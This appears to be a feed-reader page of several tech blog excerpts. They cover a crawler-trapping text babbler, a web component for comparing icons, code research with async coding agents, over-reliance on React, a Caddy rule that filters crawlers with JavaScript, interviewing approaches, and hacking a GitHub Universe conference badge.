- I hope it will make future LLMs sound slightly old-school and spoooooky.
- It's in the public domain, so no copyright issues.
- I find there are many parallels to be drawn between Dr Frankenstein's monster and AI.
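The Frankenstein babbler described above boils down to a few lines of logic. Here is a minimal sketch of my own with a stand-in corpus; the real version loads the actual novel and serves the result over HTTP:

```python
import random

# Stand-in corpus: the real server loads the full text of Frankenstein,
# split into paragraphs and kept in RAM.
PARAGRAPHS = [f"Paragraph {i} of the novel." for i in range(200)]

def babble_page(seed=None):
    """Build one fake 'post': a random window of paragraphs plus five links."""
    rng = random.Random(seed)
    start = rng.randrange(len(PARAGRAPHS) - 4)
    return {
        # A random index and the subsequent paragraphs to display
        "body": PARAGRAPHS[start:start + 4],
        # Five outgoing links that all hit the same endpoint, so a
        # breadth-first crawler branches by a factor of 5 per page.
        "links": [f"/babbler/?p={rng.randrange(10**6)}" for _ in range(5)],
    }

page = babble_page(seed=42)
```

Since everything lives in one in-memory list and each request is just an index lookup, this stays cheap to serve even under heavy crawler load.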

Jim Nielsen 3 weeks ago

Leveraging a Web Component For Comparing iOS and macOS Icons

Whenever Apple does a visual refresh in their OS updates, a new wave of icon archiving starts for me. Now that “Liquid Glass” is out, I’ve begun nabbing the latest icons from Apple and other apps and adding them to my gallery.

Since I’ve been collecting these icons for so long, one of the more interesting and emerging attributes of my collection is the visual differences in individual app icons over time. For example: what are the differences between the icons I have in my collection for Duolingo? Well, I have a page for that today . That’ll let you see all the different versions I’ve collected for Duolingo — not exhaustive, I’m sure, but still interesting — as well as their different sizes . But what if you want to analyze their differences pixel-by-pixel? Turns out, There’s A Web Component For That™️.

Image Compare is exactly what I was envisioning: “A tiny, zero-dependency web component for comparing two images using a slider” from the very fine folks at Cloud Four . It’s super easy to use: some HTML and a link to a script (hosted if you like, or you can vendor it ). And just like that, boom, I’ve got a widget for comparing two icons.

For Duolingo specifically, I have a long history of icons archived in my gallery and they’re all available under the route for your viewing and comparison pleasure . Wanna see some more examples besides Duolingo? Check out the ones for GarageBand , Instagram , and Highlights for starters. Or, just look at the list of iOS apps and find the ones that are interesting to you (or if you’re a fan of macOS icons, check these ones out ).

I kinda love how easy it was for my thought process to go from idea to reality:

- “It would be cool to compare differences in icons by overlaying them…“
- “Image diff tools do this, I bet I could find a good one…“
- “Hey, Cloud Four makes a web component for this? Surely it’s good…”
- “Hey look, it’s just HTML: a tag linking to compiled JS along with a custom element? Easy, no build process required…“
- “Done. Well that was easy. I guess the hardest part here will be writing the blog post about it.”

And I’ve written the post, so this chunk of work is now done. Reply via: Email · Mastodon · Bluesky
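For reference, the markup looks roughly like this. This is my own sketch, not taken from the post, so double-check Cloud Four's documentation for the exact element and slot names; the image URLs are placeholders:

```html
<!-- Hypothetical sketch: verify element/slot names against Cloud Four's docs -->
<image-compare label="Duolingo icon, old vs. new">
  <img slot="image-1" alt="Old Duolingo icon" src="/icons/duolingo-old.png">
  <img slot="image-2" alt="New Duolingo icon" src="/icons/duolingo-new.png">
</image-compare>
<script type="module" src="/js/image-compare.js"></script>
```

Because it is a custom element, browsers that fail to load the script simply render the two images stacked, which degrades gracefully.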

Simon Willison 3 weeks ago

Code research projects with async coding agents like Claude Code and Codex

I've been experimenting with a pattern for LLM usage recently that's working out really well: asynchronous code research tasks . Pick a research question, spin up an asynchronous coding agent and let it go and run some experiments and report back when it's done. Software development benefits enormously from something I call code research . The great thing about questions about code is that they can often be definitively answered by writing and executing code. I often see questions on forums which hint at a lack of understanding of this skill. "Could Redis work for powering the notifications feed for my app?" is a great example. The answer is always "it depends", but a better answer is that a good programmer already has everything they need to answer that question for themselves. Build a proof-of-concept, simulate the patterns you expect to see in production, then run experiments to see if it's going to work. I've been a keen practitioner of code research for a long time. Many of my most interesting projects started out as a few dozen lines of experimental code to prove to myself that something was possible. It turns out coding agents like Claude Code and Codex are a fantastic fit for this kind of work as well. Give them the right goal and a useful environment and they'll churn through a basic research project without any further supervision. LLMs hallucinate and make mistakes. This is far less important for code research tasks because the code itself doesn't lie: if they write code and execute it and it does the right things then they've demonstrated to both themselves and to you that something really does work. They can't prove something is impossible - just because the coding agent couldn't find a way to do something doesn't mean it can't be done - but they can often demonstrate that something is possible in just a few minutes of crunching. 
I've used interactive coding agents like Claude Code and Codex CLI for a bunch of these, but today I'm increasingly turning to their asynchronous coding agent family members instead. An asynchronous coding agent is a coding agent that operates on a fire-and-forget basis. You pose it a task, it churns away on a server somewhere and when it's done it files a pull request against your chosen GitHub repository. OpenAI's Codex Cloud , Anthropic's Claude Code for web , Google Gemini's Jules , and GitHub's Copilot coding agent are four prominent examples of this pattern. These are fantastic tools for code research projects. Come up with a clear goal, turn it into a few paragraphs of prompt, set them loose and check back ten minutes later to see what they've come up with. I'm firing off 2-3 code research projects a day right now. My own time commitment is minimal and they frequently come back with useful or interesting results. You can run a code research task against an existing GitHub repository, but I find it's much more liberating to have a separate, dedicated repository for your coding agents to run their projects in. This frees you from being limited to research against just code you've already written, and also means you can be much less cautious about what you let the agents do. I have two repositories that I use for this - one public, one private. I use the public one for research tasks that have no need to be private, and the private one for anything that I'm not yet ready to share with the world. The biggest benefit of a dedicated repository is that you don't need to be cautious about what the agents operating in that repository can do. Both Codex Cloud and Claude Code for web default to running agents in a locked-down environment, with strict restrictions on how they can access the network. 
This makes total sense if they are running against sensitive repositories - a prompt injection attack of the lethal trifecta variety could easily be used to steal sensitive code or environment variables. If you're running in a fresh, non-sensitive repository you don't need to worry about this at all! I've configured my research repositories for full network access, which means my coding agents can install any dependencies they need, fetch data from the web and generally do anything I'd be able to do on my own computer.

Let's dive into some examples. My public research repository is at simonw/research on GitHub. It currently contains 13 folders, each of which is a separate research project. I only created it two weeks ago so I'm already averaging nearly one a day! It also includes a GitHub Workflow which uses GitHub Models to automatically update the README file with a summary of every new project, using Cog , LLM , llm-github-models and this snippet of Python .

Here are some example research projects from the repo. node-pyodide shows an example of a Node.js script that runs the Pyodide WebAssembly distribution of Python inside it - yet another of my ongoing attempts to find a great way of running Python in a WebAssembly sandbox on a server. python-markdown-comparison ( transcript ) provides a detailed performance benchmark of seven different Python Markdown libraries. I fired this one off because I stumbled across cmarkgfm , a Python binding around GitHub's Markdown implementation in C, and wanted to see how it compared to the other options. This one produced some charts!
cmarkgfm came out on top by a significant margin. Here's the entire prompt I used for that project:

> Create a performance benchmark and feature comparison report on PyPI cmarkgfm compared to other popular Python markdown libraries - check all of them out from github and read the source to get an idea for features, then design and run a benchmark including generating some charts, then create a report in a new python-markdown-comparison folder (do not create a _summary.md file or edit anywhere outside of that folder). Make sure the performance chart images are directly displayed in the README.md in the folder.

Note that I didn't specify any Markdown libraries other than cmarkgfm - Claude Code ran a search and found the other six by itself.

cmarkgfm-in-pyodide is a lot more fun. A neat thing about having all of my research projects in the same repository is that new projects can build on previous ones. Here I decided to see how hard it would be to get cmarkgfm - which has a C extension - working inside Pyodide inside Node.js. Claude successfully compiled an 88.4KB file with the necessary C extension and proved it could be loaded into Pyodide in WebAssembly inside of Node.js. I ran this one using Claude Code on my laptop after an initial attempt failed. The starting prompt was:

> Figure out how to get the cmarkgfm markdown lover [typo in prompt, this should have been "library" but it figured it out anyway] for Python working in pyodide. This will be hard because it uses C so you will need to compile it to pyodide compatible webassembly somehow. Write a report on your results plus code to a new cmarkgfm-in-pyodide directory. Test it using pytest to exercise a node.js test script that calls pyodide as seen in the existing node.js and pyodide directory. There is an existing branch that was an initial attempt at this research, but which failed because it did not have Internet access. You do have Internet access. Use that existing branch to accelerate your work, but do not commit any code unless you are certain that you have successfully executed tests that prove that the pyodide module you created works correctly.

This one gave up half way through, complaining that emscripten would take too long. I told it:

> Complete this project, actually run emscripten, I do not care how long it takes, update the report if it works

It churned away for a bit longer and complained that the existing Python library used CFFI, which isn't available in Pyodide. I asked it:

> Can you figure out how to rewrite cmarkgfm to not use FFI and to use a pyodide-friendly way of integrating that C code instead?

... and it did. You can see the full transcript here .

blog-tags-scikit-learn . Taking a short break from WebAssembly, I thought it would be fun to put scikit-learn through its paces on a text classification task against my blog:

> Work in a new folder called blog-tags-scikit-learn. Download - a SQLite database. Take a look at the blog_entry table and the associated tags - a lot of the earlier entries do not have tags associated with them, where the later entries do. Design, implement and execute models to suggests tags for those earlier entries based on textual analysis against later ones. Use Python scikit learn and try several different strategies. Produce JSON of the results for each one, plus scripts for running them and a detailed markdown description. Also include an HTML page with a nice visualization of the results that works by loading those JSON files.

This resulted in seven files, four results files and a detailed report . (It ignored the bit about an HTML page with a nice visualization for some reason.) Not bad for a few moments of idle curiosity typed into my phone!

That's just three of the thirteen projects in the repository so far. The commit history for each one usually links to the prompt and sometimes the transcript if you want to see how they unfolded.
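A Markdown benchmark of this kind is, at its core, a small timing loop. Here is a stdlib-only sketch of my own with stand-in converter functions; the agent's real project imports cmarkgfm and the other libraries instead:

```python
import timeit

# Stand-in "libraries": the real benchmark imports cmarkgfm, markdown, etc.
def fast_convert(text):
    return text.replace("# ", "<h1>")

def slow_convert(text):
    out = text
    for _ in range(40):  # simulate a slower pure-Python implementation
        out = "".join(ch for ch in out)
    return out.replace("# ", "<h1>")

DOC = "# Title\n" + ("Some *markdown* body text.\n" * 200)

def bench(fn, number=100):
    """Seconds taken to convert DOC `number` times."""
    return timeit.timeit(lambda: fn(DOC), number=number)

results = {name: bench(fn) for name, fn in
           [("fast", fast_convert), ("slow", slow_convert)]}
```

From the `results` dict it is a short step to the bar charts the agent generated; the interesting work is picking a representative corpus, not the loop itself.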
More recently I added a short file to the repo with a few extra tips for my research agents. You can read that here .

My preferred definition of AI slop is AI-generated content that is published without human review. I've not been reviewing these reports in great detail myself, and I wouldn't usually publish them online without some serious editing and verification. I want to share the pattern I'm using though, so I decided to keep them quarantined in this one public repository. A tiny feature request for GitHub: I'd love to be able to mark a repository as "exclude from search indexes" such that it gets labelled with noindex tags. I still like to keep AI-generated content out of search, to avoid contributing more to the dead internet .

It's pretty easy to get started trying out this coding agent research pattern. Create a free GitHub repository (public or private) and let some agents loose on it and see what happens. You can run agents locally but I find the asynchronous agents to be more convenient - especially as I can run them (or trigger them from my phone) without any fear of them damaging my own machine or leaking any of my private data. Claude Code for web offers $250 of free credits for their $20/month users for a limited time (until November 18, 2025). Gemini Jules has a free tier . There are plenty of other coding agents you can try out as well. Let me know if your research agents come back with anything interesting!

You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options .

Den Odell 3 weeks ago

Escape Velocity: Break Free from Framework Gravity

Frameworks were supposed to free us from the messy parts of the web. For a while they did, until their gravity started drawing everything else into orbit. Every framework brought with it real progress. React, Vue, Angular, Svelte, and others all gave structure, composability, and predictability to frontend work. But now, after a decade of React dominance, something else has happened. We haven’t just built apps with React, we’ve built an entire ecosystem around it—hiring pipelines, design systems, even companies—all bound to its way of thinking. The problem isn’t React itself, nor any other framework for that matter. The problem is the inertia that sets in once any framework becomes infrastructure. By that point, it’s “too important to fail,” and everything nearby turns out to be just fragile enough to prove it. React is no longer just a library. It’s a full ecosystem that defines how frontend developers are allowed to think. Its success has created its own kind of gravity, and the more we’ve built within it, the harder it’s become to break free. Teams standardize on it because it’s safe: it’s been proven to work at massive scale, the talent pool is large, and the tooling is mature. That’s a rational choice, but it also means React exerts institutional gravity. Moving off it stops being an engineering decision and becomes an organizational risk instead. Solutions to problems tend to be found within its orbit, because stepping outside it feels like drifting into deep space. We saw this cycle with jQuery in the past, and we’re seeing it again now with React. We’ll see it with whatever comes next. Success breeds standardization, standardization breeds inertia, and inertia convinces us that progress can wait. It’s the pattern itself that’s the problem, not any single framework. But right now, React sits at the center of this dynamic, and the stakes are far higher than they ever were with jQuery. 
Entire product lines, architectural decisions, and career paths now depend on React-shaped assumptions. We’ve even started defining developers by their framework: many job listings ask for “React developers” instead of frontend engineers. Even AI coding agents default to React when asked to start a new frontend project, unless deliberately steered elsewhere. Perhaps the only thing harder than building on a framework is admitting you might need to build without one.

React’s evolution captures this tension perfectly. Recent milestones include the creation of the React Foundation , the React Compiler reaching v1.0 , and new additions in React 19.2 such as the `<Activity>` component and Fragment Refs. These updates represent tangible improvements, especially the compiler, which brings automatic memoization at build time, eliminating the need for manual `useMemo` and `useCallback` optimization. Production deployments show real performance wins using it: apps in the Meta Quest Store saw up to 2.5x faster interactions as a direct result. This kind of automatic optimization is genuinely valuable work that pushes the entire ecosystem forward.

But here’s the thing: the web platform has been quietly heading in the same direction for years, building many of the same capabilities frameworks have been racing to add. Browsers now ship View Transitions, Container Queries, and smarter scheduling primitives. The platform keeps evolving at a fair pace, but most teams won’t touch these capabilities until React officially wraps them in a hook or they show up in Next.js docs. Innovation keeps happening right across the ecosystem, but for many it only becomes “real” once React validates the approach. Which is fine, assuming you enjoy waiting for permission to use the platform you’re already building on.

The React Foundation represents an important milestone for governance and sustainability.
This new foundation is a part of the Linux Foundation, and founding members include Meta, Vercel, Microsoft, Amazon, Expo, Callstack, and Software Mansion. This is genuinely good for React’s long-term health, providing better governance and removing the risk of being owned by a single company. It ensures React can outlive any one organization’s priorities. But it doesn’t fundamentally change the development dynamic of the framework. Yet. The engineers who actually build React still work at companies like Meta and Vercel. The research still happens at that scale, driven by those performance needs. The roadmap still reflects the priorities of the companies that fund full-time development. And to be fair, React operates at a scale most frameworks will never encounter. Meta serves billions of users through frontends that run on constrained mobile devices around the world, so it needs performance at a level that justifies dedicated research teams. The innovations they produce, including compiler-driven optimization, concurrent rendering, and increasingly fine-grained performance tooling, solve real problems that exist only at that kind of massive scale. But those priorities aren’t necessarily your priorities, and that’s the tension. React’s innovations are shaped by the problems faced by companies running apps at billions-of-users scale, not necessarily the problems faced by teams building for thousands or millions. React’s internal research reveals the team’s awareness of current architectural limitations. Experimental projects like Forest explore signal-like lazy computation graphs; essentially fine-grained reactivity instead of React’s coarse re-render model. Another project, Fir , investigates incremental rendering techniques. These aren’t roadmap items; they’re just research prototypes happening inside Meta. They may never ship publicly. 
But they do reveal something important: React’s team knows the virtual DOM model has performance ceilings and they’re actively exploring what comes after it. This is good research, but it also illustrates the same dynamic at play again: that these explorations happen behind the walls of Big Tech, on timelines set by corporate priorities and resource availability. Meanwhile, frameworks like Solid and Qwik have been shipping production-ready fine-grained reactivity for years. Svelte 5 shipped runes in 2024, bringing signals to mainstream adoption. The gap isn’t technical capability, but rather when the industry feels permission to adopt it. For many teams, that permission only comes once React validates the approach. This is true regardless of who governs the project or what else exists in the ecosystem. I don’t want this critique to take away from what React has achieved over the past twelve years. React popularized declarative UIs and made component-based architecture mainstream, which was a huge deal in itself. It proved that developer experience matters as much as runtime performance and introduced the idea that UI could be a pure function of input props and state. That shift made complex interfaces far easier to reason about. Later additions like hooks solved the earlier class component mess elegantly, and concurrent rendering opened new possibilities for truly responsive UIs. The React team’s research into compiler optimization, server components, and fine-grained rendering pushes the entire ecosystem forward. This is true even when other frameworks ship similar ideas first. There’s value in seeing how these patterns work at Meta’s scale. The critique isn’t that React is bad, but that treating any single framework as infrastructure creates blind spots in how we think and build.
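The fine-grained reactivity model that Solid, Qwik, and Svelte’s runes ship can be sketched in a few lines of plain JavaScript. This is a toy illustration of the idea, not any framework’s actual implementation:

```javascript
// A signal tracks which effects read it, so a write re-runs only
// those effects instead of re-rendering a whole component tree.
let activeEffect = null;

function signal(value) {
  const subscribers = new Set();
  return {
    get() {
      if (activeEffect) subscribers.add(activeEffect); // track the reader
      return value;
    },
    set(next) {
      value = next;
      subscribers.forEach((fn) => fn()); // notify only dependents
    },
  };
}

function effect(fn) {
  activeEffect = fn;
  fn(); // run once so signal reads inside register this effect
  activeEffect = null;
}
```

A `count` signal read inside an `effect` re-runs that effect on every `count.set(...)`, with no diffing step in between; that is the contrast with React’s coarse re-render model.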
When React becomes the lens through which we see the web, we stop noticing what the platform itself can already do, and we stop reaching for native solutions because we’re waiting for the framework-approved version to show up first. And crucially, switching to Solid, Svelte, or Vue wouldn’t eliminate this dynamic; it would only shift its center of gravity. Every framework creates its own orbit of tools, patterns, and dependencies. The goal isn’t to find the “right” framework, but to build applications resilient enough to survive migration to any framework, including those that haven’t been invented yet. This inertia isn’t about laziness; it’s about logistics. Switching stacks is expensive and disruptive. Retraining developers, rebuilding component libraries, and retooling CI pipelines all take time and money, and the payoff is rarely immediate. It’s high risk, high cost, and hard to justify, so most companies stay put, and honestly, who can blame them? But while we stay put, the platform keeps moving. The browser can stream and hydrate progressively, animate transitions natively, and coordinate rendering work without a framework. Yet most development teams won’t touch those capabilities until they’re built in or officially blessed by the ecosystem. That isn’t an engineering limitation; it’s a cultural one. We’ve somehow made “works in all browsers” feel riskier than “works in our framework.” Better governance doesn’t solve this. The problem isn’t React’s organizational structure; it’s our relationship to it. Too many teams wait for React to package and approve platform capabilities before adopting them, even when those same features already exist in browsers today. React 19.2’s `<Activity />` component captures this pattern perfectly. It serves as a boundary that hides UI while preserving component state and unmounting effects. When set to `mode="hidden"`, it pauses subscriptions, timers, and network requests while keeping form inputs and scroll positions intact. When revealed again by setting `mode="visible"`, those effects remount cleanly. It’s a genuinely useful feature. Tabbed interfaces, modals, and progressive rendering all benefit from it, and the same idea extends to cases where you want to pre-render content in the background or preserve state as users navigate between views. It integrates smoothly with React’s lifecycle and `<Suspense>` boundaries, enabling selective hydration and smarter rendering strategies. But it also draws an important line between formalization and innovation . The core concept isn’t new; it’s simply about pausing side effects while maintaining state. Similar behavior can already be built with visibility observers, effect cleanup, and careful state management patterns. The web platform even provides the primitives for it through tools like `IntersectionObserver`, DOM state preservation, and manual effect control. What `<Activity />` adds is the formalization: a polished, well-integrated API, not a new capability. Yet it also exposes how dependent our thinking has become on frameworks. We wait for React to formalize platform behaviors instead of reaching for them directly. This isn’t a criticism of `<Activity />` itself; it’s a well-designed API that solves a real problem. But it serves as a reminder that we’ve grown comfortable waiting for framework solutions to problems the platform already lets us solve. After orbiting React for so long, we’ve forgotten what it feels like to build without its pull. The answer isn’t necessarily to abandon your framework, but to remember that it runs inside the web, not the other way around. I’ve written before about building the web in islands as one way to rediscover platform capabilities we already have. Even within React’s constraints, you can still think platform first; a list of concrete practices closes out this post. These aren’t anti-React practices, they’re portable practices that make your web app more resilient. They let you adopt new browser capabilities as soon as they ship, not months later when they’re wrapped in a hook. They make framework migration feasible rather than catastrophic.
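The pause-effects-but-keep-state idea is itself framework-independent. Here is a hedged sketch of the core mechanism; the name `createActivity` is invented for illustration, and a real version would wire `show`/`hide` to something like `IntersectionObserver` or route changes:

```javascript
// Hiding runs the effect's cleanup (unsubscribe, clear timers) while
// the state object survives untouched, ready for the next show().
function createActivity(startEffect) {
  const state = {}; // preserved across hide/show cycles
  let cleanup = null;
  return {
    state,
    show() {
      if (!cleanup) cleanup = startEffect(state); // (re)mount effects
    },
    hide() {
      if (cleanup) {
        cleanup(); // unmount effects only; state is kept
        cleanup = null;
      }
    },
  };
}
```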
When you build this way, React becomes a rendering library that happens to be excellent at its job, not the foundation everything else has to depend on. A React app that respects the platform can outlast React itself. When you treat React as an implementation detail instead of an identity, your architecture becomes portable. When you embrace progressive enhancement and web semantics, your ideas survive the next framework wave. The recent wave of changes, including the React Foundation, React Compiler v1.0, the `<Activity />` component, and internal research into alternative architectures, all represent genuine progress. The React team is doing thoughtful work, but these updates also serve as reminders of how tightly the industry has become coupled to a single ecosystem’s timeline. That timeline is still dictated by the engineering priorities of large corporations, and that remains true regardless of who governs the project. If your team’s evolution depends on a single framework’s roadmap, you are not steering your product; you are waiting for permission to move. That is true whether you are using React, Vue, Angular, or Svelte. The framework does not matter; the dependency does. It is ironic that we spent years escaping jQuery’s gravity, only to end up caught in another orbit. React was once the radical idea that changed how we build for the web. Every successful framework reaches this point eventually, when it shifts from innovation to institution, from tool to assumption. jQuery did it, React did it, and something else will do it next. The React Foundation is a positive step for the project’s long-term sustainability, but the next real leap forward will not come from better governance. It will not come from React finally adopting signals either, and it will not come from any single framework “getting it right.” Progress will come from developers who remember that frameworks are implementation details, not identities. Build for the platform first. Choose frameworks second.
The web isn’t React’s, it isn’t Vue’s, and it isn’t Svelte’s. It belongs to no one. If we remember that, it will stay free to evolve at its own pace, drawing the best ideas from everywhere rather than from whichever framework happens to hold the cultural high ground. Frameworks are scaffolding, not the building. Escaping their gravity does not mean abandoning progress; it means finding enough momentum to keep moving. Reaching escape velocity, one project at a time.

Platform-first practices:

- Use native forms and form submissions to a server, then enhance with client-side logic
- Prefer semantic HTML and ARIA before reaching for component libraries
- Try View Transitions directly with minimal React wrappers instead of waiting for an official API
- Use Web Components for self-contained widgets that could survive a framework migration
- Keep business logic framework-agnostic, plain TypeScript modules rather than hooks, and aim to keep your hooks short by pulling logic from outside React
- Profile performance using browser DevTools first and React DevTools second
- Try native CSS features like scroll snap before adding JavaScript solutions
- Use native browser APIs instead of framework-specific alternatives wherever possible
- Experiment with the History API directly before reaching for React Router
- Structure code so routing, data fetching, and state management can be swapped out independently of React
- Test against real browser APIs and behaviors, not just framework abstractions
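The framework-agnostic business logic practice can be as simple as keeping state transitions in a plain module with no framework imports. A minimal sketch (the cart functions and field names are invented for illustration):

```javascript
// Plain business-logic module: no framework imports. A React hook,
// a Svelte store, or a Web Component can all wrap these same functions.
function addItem(cart, item) {
  return [...cart, item]; // pure: returns a new cart, never mutates
}

function totalCents(cart) {
  return cart.reduce((sum, item) => sum + item.priceCents * item.qty, 0);
}
```

Because nothing here touches React, the same module is trivially unit-testable in Node and survives a framework migration unchanged.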

0 views
Rik Huijzer 3 weeks ago

AI Crawler Mitigation via a Few Lines of Caddy

To mitigate AI crawlers, simply require a bit of Javascript:

```caddy
domain.com {
    # Match all requests without a "verified" cookie
    @unverified not header Cookie *verified*

    # Serve them a JS page that sets the cookie
    # (heredoc body reconstructed: set the cookie client-side and
    # reload, which non-JS crawlers never do)
    handle @unverified {
        header Content-Type text/html
        respond <<EOF
        <script>
            document.cookie = "verified=1";
            window.location.reload();
        </script>
        EOF 418
    }

    # Handle all other requests normally
    reverse_proxy localhost:3001
}
```

This works because these crawlers have disabl...

0 views

Gatekeepers vs. Matchmakers

I estimate I’ve conducted well over 1,000 job interviews for developers and managers in my career. This has caused me to form opinions about what makes a good interview. I’ve spent the majority of my career in fast-growing companies and, with the exception of occasional pauses here and there, we were always hiring. I’ve interviewed at every level from intern (marathon sessions at the University of Waterloo campus interviewing dozens of candidates over a couple of days) to VP and CTO level (my future bosses in some cases, my successor in roles I was departing in others). Probably the strongest opinion that I hold after all that is: adopting a Matchmaker approach builds much better teams than falling into Gatekeeper mode. Once the candidate has passed some sort of initial screen, either with a recruiter, the hiring manager, or both, most “primary” interviews are conducted with two to three employees interviewing the candidate—often the hiring manager and an individual contributor. (Of course, there are innumerable ways you can structure this, but that structure is what I’ve seen to be the most common.) Interviewers usually start with one of two postures:

- The Gatekeeper : “I don’t want to hire this person unless they prove themselves worthy. It’s my job to keep the bad and fake programmers out.”
- The Matchmaker : “I want to hire this person unless they disqualify themselves somehow. It’s my job to find a good match between our needs and the candidate’s skills and interests.”

The former, the Gatekeeper , I would say is more common overall and certainly more common among individual contributors and people earlier in their career. It’s also a big driver of why a lot of interview processes include some sort of coding “test” meant to expose the fraudulent scammers pretending to be “real” programmers. All of that dates back to the early 2000s and the post-dotcom crash. Pre-crash, anyone with a pulse who could string together some HTML could get a “software developer” job, so there were a lot of people with limited experience and skills on the job market. Nowadays, aside from outright fraudsters (which are rare) I haven’t observed many wholly unqualified people getting past the résumé review or initial screen.
If you let Gatekeepers design your interview process, you’ll often get something that I refer to as “programmer Jeopardy! .” The candidate is peppered with what amount to trivia questions:

- What’s a deadlock? How do you resolve it?
- Oh, you know Java? Explain how the garbage collector works!
- What’s the CAP theorem?

…and so on. For most jobs where you’re building commercial software by gluing frameworks and APIs together, having vague (or even no) knowledge of those concepts is going to be plenty. Most devs can go a long time using Java or C# before getting into some sort of jam where learning intimate details of the garbage collector’s operation gets them out of it. (This wasn’t always true, but things have improved.) Of course, if the job you’re hiring for is some sort of specialist role around your databases, queuing systems, or infrastructure in general, you absolutely should probe for specialist knowledge of those things. But if the job is “full stack web developer,” where they’re mostly going to be writing business logic and user interface code, they may have plenty of experience and be very good at those things without ever having needed to learn about consensus algorithms and the like. Then, of course, there’s the much-discussed “coding challenge,” the worst versions of which involve springing a problem on someone, giving them a generous four or five minutes to read it, then expecting them to code a solution with a countdown timer running and multiple people watching them. Not everyone can put their best foot forward in those conditions, and after you’ve run the same exercise more than a few times with candidates, it’s easy to forget what the “first-look” experience is like for candidates. Maybe I’ll write a full post about it someday, but it’s my firm conviction that these types of tests have a false-negative rate so high that they’re counterproductive.
Gatekeeper types often over-rotate on the fear of “fake” programmers getting hired and use these trivia-type questions and high-pressure exercises to disqualify people who would be perfectly capable of doing the job you need them to do and perfectly capable of learning any of that other stuff quickly, on an as-needed basis. If your interview process feels a bit like an elimination game show, you can probably do better. You, as a manager, are judged both on the quality of your hires and your ability to fill open roles. When the business budgets for a role to be filled, they do so because they expect a business outcome from hiring that person. Individual contributors are not generally rewarded or punished for hiring decisions, so their incentive is to avoid bringing in people who make extra work for them. Hiring an underskilled person onto the team is a good way to drag down productivity rather than improve it, as everyone has to spend some of their time carrying that person. Additionally, the absence of any kind of licensing or credentialing structure in programming creates a vacuum that the elimination game show tries to fill. In medicine, law, aviation, or the trades, there’s an external gatekeeper that ensures a baseline level of competence before anyone can even apply for a job. In software, there’s no equivalent, so it makes sense that some interviewers take a “prove to me you can do this job” approach out of the gate. But there’s a better way. “Matchmaking” in the romantic sense tries to pair up people with mutual compatibilities in the hopes that their relationship will also be mutually beneficial to both parties—a real “whole is greater than the sum of its parts” scenario. This should also be true of hiring. You have a need for some skills that will elevate and augment your team; candidates have a desire to do work that means something to them with people they like being around (and yes, money to pay the bills, of course).
When people date each other, they’re usually not looking to reject someone based on a box-checking exercise. Obviously, some don’t make it past the initial screen for various reasons, but if you’re going on a second date and looking for love, you’re probably doing it because you want it to work out. Same goes for hiring. If you take the optimistic route, you can let go of some of the pass/fail and one-size-fits-all approaches to candidate evaluation and spend more time trying to find a love match. For all but the most junior roles, I’m confident you can get a strong handle on a candidate’s technical skills by exploring their work history in depth. I’m a big fan of “behavioural” interviewing, where you ask about specific things the candidate has done. I start with a broad opening question and then use ad hoc follow-ups in as conversational a manner as I can muster. I want to have a discussion, not an interrogation. Start with questions like:

- What’s the work you’ve done that you’re the most proud of?
- What’s the hardest technical problem you’ve encountered? What was the resolution?
- Tell me about your favourite team member to work with. Least favourite?

If you practice, or watch someone who is good at this type of interview, you can easily fill a 45–60 minute interview slot with a couple of those top-level questions and some ad hoc follow-ups based on their answers. Of the three examples I gave, two are a good starting place for assessing technical skills. Most developers will give you a software project as the work they’re the most proud of (if they say “I raised hamsters as a kid,” feel free to ask them to limit it to the realm of software development and try again). This is your opportunity to dig in on the technical details:

- What language or frameworks did they use? Did they choose, or did someone else?
- How was it deployed?
- What sort of testing strategy did they use?
- What databases were involved?
- How did their stuff fit into the architecture of the broader system?

Questions like that will give you a much stronger signal on their technical skills and, importantly, experience. You should be able to easily tell how much the candidate was a driver vs. a passenger on the project, whether or not they thought about the bigger picture, and how deep or shallow their knowledge was. And, of course, you can keep asking follow-up questions to the follow-up questions until you’ve got a good sense.
Interviewing and taking a job does have a lot of parallels to dating and getting married. There are emotional and financial implications for both parties if it doesn’t work out, there’s always a degree of risk involved, and there’s sometimes a degree of asymmetry between the parties. In the job market, the asymmetry is nearly always in favour of the employer. They hold most of the cards and can dictate the terms of the process completely. You have a choice as a leader how much you want to wield that power. My advice is to wield it sparingly—try to give candidates the kind of experience where even if you don’t hire them, they had a good enough time in the process that they’d still recommend you to a friend. Taking an interest in their experience, understanding what motivates them, and fitting candidates to the role that maximizes their existing skills, challenges them in the right ways, and takes maximum advantage of their intrinsic motivations will produce much better results than making them run through the gauntlet like a contestant on Survivor . " Old Royal Naval College, Greenwich - King William Court and Queen Mary Court - gate " by ell brown is licensed under CC BY 2.0 .

1 views
Simon Willison 1 months ago

Hacking the WiFi-enabled color screen GitHub Universe conference badge

I'm at GitHub Universe this week (thanks to a free ticket from Microsoft). Yesterday I picked up my conference badge... which incorporates a full Raspberry Pi Pico microcontroller with a battery, color screen, WiFi and bluetooth. GitHub Universe has a tradition of hackable conference badges - the badge last year had an eInk display. This year's is a huge upgrade though - a color screen and WiFi connection make this thing a genuinely useful little computer! The only thing it's missing is a keyboard - the device instead provides five buttons total - Up, Down, A, B, C. It might be possible to get a bluetooth keyboard to work though I'll believe that when I see it - there's not a lot of space on this device for a keyboard driver. Everything is written using MicroPython, and the device is designed to be hackable: connect it to a laptop with a USB-C cable and you can start modifying the code directly on the device. Out of the box the badge will play an opening animation (implemented as a sequence of PNG image frames) and then show a home screen with six app icons. The default apps are mostly neat Octocat-themed demos: a flappy-bird clone, a tamagotchi-style pet, a drawing app that works like an etch-a-sketch, an IR scavenger hunt for the conference venue itself (this thing has an IR sensor too!), and a gallery app showing some images. The sixth app is a badge app. This will show your GitHub profile image and some basic stats, but will only work if you dig out a USB-C cable and make some edits to the files on the badge directly. I did this on a Mac. I plugged a USB-C cable into the badge which caused macOS to treat it as an attached drive volume. In that drive are several files, including a config file. Open that up, confirm the WiFi details are correct and add your GitHub username. The file should look like this: The badge comes with the SSID and password for the GitHub Universe WiFi network pre-populated. That's it!
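The config file contents didn't survive syndication, so here is a rough, hypothetical sketch of its shape. The field names are guesses for illustration, not the badge's documented API:

```python
# Hypothetical badge config -- real field names may differ.
# SSID and password come pre-populated for the conference network.
WIFI_SSID = "GitHubUniverse"
WIFI_PASSWORD = "replace-me"
GITHUB_USERNAME = "your-github-username"
```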
